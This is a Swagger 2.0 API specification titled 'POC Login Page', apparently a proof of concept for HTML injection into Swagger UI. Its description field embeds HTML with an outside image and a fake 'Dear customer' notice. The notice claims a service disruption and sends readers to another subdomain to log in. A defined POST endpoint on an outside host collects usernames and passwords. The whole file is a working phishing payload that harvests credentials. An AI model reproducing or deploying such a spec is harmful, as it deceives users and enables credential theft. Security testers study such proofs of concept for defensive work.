swagger: '2.0'
info:
  version: 1.0.0
  title: POC Login Page
  description: <img src="https://muslimsec.com/junara/junara_f.jpg" alt="POC image"><br><br><b>Dear customer</b>,<br>We are experiencing a disruption in the main domain,<br> we are currently in the process of working on repairing the service, Please temporarily log in through the new subdomain at <p style="color:blue">MPL.junara.com</p>.<br><b><i>Thank you</i></b>.
host: muslimsec.com
basePath: /tmsg/
paths:
 /Login_Page.php:
    post:
      summary: Login here to continue
      description: Please provide your credentials to log in.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: Successfully logged in and authenticated.
        '400':
          description: Invalid credentials or missing parameters.
        '500':
          description: Internal server error.
